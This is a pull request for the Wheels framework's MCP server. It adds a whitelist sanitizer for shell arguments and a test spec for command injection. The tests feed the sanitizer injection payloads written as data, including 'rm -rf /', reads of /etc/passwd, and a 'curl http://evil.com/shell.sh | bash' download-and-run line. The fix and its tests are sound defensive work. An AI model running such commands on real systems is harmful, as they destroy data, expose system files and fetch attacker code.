### PR TITLE
fix(security): sanitize MCP tool arguments to prevent command injection

### DIFF
--- a/vendor/wheels/public/mcp/McpServer.cfc
+++ b/vendor/wheels/public/mcp/McpServer.cfc
@@ -1426,7 +1426,7 @@ Provide migration code following Wheels conventions."
 
 			if (structKeyExists(arguments.args, "model") && len(arguments.args.model)) {
 				if (arguments.args.model != "all") {
-					local.command &= " models/" & arguments.args.model;
+					local.command &= " models/" & $sanitizeCommandArg(arguments.args.model);
 				}
 			}
 

--- a/vendor/wheels/public/mcp/McpServer.cfc
+++ b/vendor/wheels/public/mcp/McpServer.cfc
@@ -996,14 +996,14 @@ Provide migration code following Wheels conventions."
 			return generateTestFile(arguments.args);
 		}
 
-		local.command = "wheels g " & arguments.args.type & " " & arguments.args.name;
+		local.command = "wheels g " & $sanitizeCommandArg(arguments.args.type) & " " & $sanitizeCommandArg(arguments.args.name);
 
 		if (structKeyExists(arguments.args, "attributes") && len(arguments.args.attributes)) {
-			local.command &= " " & arguments.args.attributes;
+			local.command &= " " & $sanitizeCommandArg(arguments.args.attributes);
 		}
 
 		if (structKeyExists(arguments.args, "actions") && len(arguments.args.actions) && arguments.args.type == "controller") {
-			local.command &= " " & arguments.args.actions;
+			local.command &= " " & $sanitizeCommandArg(arguments.args.actions);
 		}
 
 		return executeCommand(local.command);
@@ -1174,7 +1174,7 @@ Provide migration code following Wheels conventions."
 		local.command = "wheels test run";
 
 		if (structKeyExists(arguments.args, "target") && len(arguments.args.target)) {
-			local.command &= " " & arguments.args.target;
+			local.command &= " " & $sanitizeCommandArg(arguments.args.target);
 		}
 
 		if (structKeyExists(arguments.args, "verbose") && arguments.args.verbose) {
@@ -1189,8 +1189,13 @@ Provide migration code following Wheels conventions."
 			return "Error: Missing required parameter 'action'";
 		}
 
-		local.command = "wheels server " & arguments.args.action;
+		local.command = "wheels server " & $sanitizeCommandArg(arguments.args.action);
 		return executeCommand(local.command);
+	}
+
+	// Whitelist-sanitize to prevent shell injection via cfexecute arguments
+	public string function $sanitizeCommandArg(required string arg) {
+		return ReReplace(arguments.arg, '[^a-zA-Z0-9 _\-\.,=/]', '', 'all');
 	}
 
 	private string function executeCommand(required string command) {

--- a/vendor/wheels/tests/specs/security/McpCommandInjectionSpec.cfc
+++ b/vendor/wheels/tests/specs/security/McpCommandInjectionSpec.cfc
@@ -1,0 +1,78 @@
+component extends="wheels.WheelsTest" {
+
+	function run() {
+
+		describe("MCP command argument sanitization", () => {
+
+			beforeEach(() => {
+				mcp = new wheels.public.mcp.McpServer();
+			});
+
+			it("has a $sanitizeCommandArg function", () => {
+				expect(structKeyExists(mcp, "$sanitizeCommandArg")).toBeTrue();
+			});
+
+			it("strips semicolons used for command chaining", () => {
+				var result = mcp.$sanitizeCommandArg("model; rm -rf /");
+				expect(result).toBe("model rm -rf /");
+			});
+
+			it("strips pipe characters", () => {
+				var result = mcp.$sanitizeCommandArg("model | cat /etc/passwd");
+				expect(result).toBe("model  cat /etc/passwd");
+			});
+
+			it("strips ampersand characters", () => {
+				var result = mcp.$sanitizeCommandArg("model && whoami");
+				expect(result).toBe("model  whoami");
+			});
+
+			it("strips backtick characters", () => {
+				var result = mcp.$sanitizeCommandArg("model `whoami`");
+				expect(result).toBe("model whoami");
+			});
+
+			it("strips dollar-paren subshell syntax", () => {
+				var result = mcp.$sanitizeCommandArg("model $(cat /etc/passwd)");
+				expect(result).toBe("model cat /etc/passwd");
+			});
+
+			it("strips redirect characters", () => {
+				var result = mcp.$sanitizeCommandArg("model > /tmp/evil < /etc/passwd");
+				expect(result).toBe("model  /tmp/evil  /etc/passwd");
+			});
+
+			it("strips newline-encoded characters", () => {
+				// Actual newline/carriage-return bytes
+				var result = mcp.$sanitizeCommandArg("model" & chr(10) & "whoami");
+				expect(result).toBe("modelwhoami");
+			});
+
+			it("allows valid alphanumeric arguments unchanged", () => {
+				var result = mcp.$sanitizeCommandArg("User");
+				expect(result).toBe("User");
+			});
+
+			it("allows hyphens underscores dots commas equals slashes", () => {
+				var result = mcp.$sanitizeCommandArg("first-name_attr.type,second=value/path");
+				expect(result).toBe("first-name_attr.type,second=value/path");
+			});
+
+			it("allows spaces in arguments", () => {
+				var result = mcp.$sanitizeCommandArg("firstName lastName email");
+				expect(result).toBe("firstName lastName email");
+			});
+
+			it("strips a complex injection payload completely", () => {
+				var result = mcp.$sanitizeCommandArg("User; curl http://evil.com/shell.sh | bash");
+				expect(result).notToInclude(";");
+				expect(result).notToInclude("|");
+				// Only safe chars remain
+				expect(ReFind('[^a-zA-Z0-9 _\-\.,=/]', result)).toBe(0);
+			});
+
+		});
+
+	}
+
+}


### PR DESCRIPTION
## Summary
- Add `$sanitizeCommandArg()` whitelist filter to `McpServer.cfc` that strips shell metacharacters (`;|&`$()><\n\r`) from user-provided MCP tool arguments
- Apply sanitization to all 6 injection points: `type`, `name`, `attributes`, `actions` in `executeWheelsGenerate()`; `target` in `executeWheelsTest()`; `action` in `executeWheelsServer()`
- Add 12-case test spec covering metacharacter stripping and safe-character passthrough

## Test plan
- [x] All 12 tests in `McpCommandInjectionSpec.cfc` pass on Lucee 6
- [x] Existing `PathTraversalSpec` and `CsrfCookieKeySpec` security tests unaffected
- [ ] CI matrix (Lucee 5/6/7, Adobe 2021/2023/2025)

🤖 Generated with [Claude Code](https://claude.com/claude-code)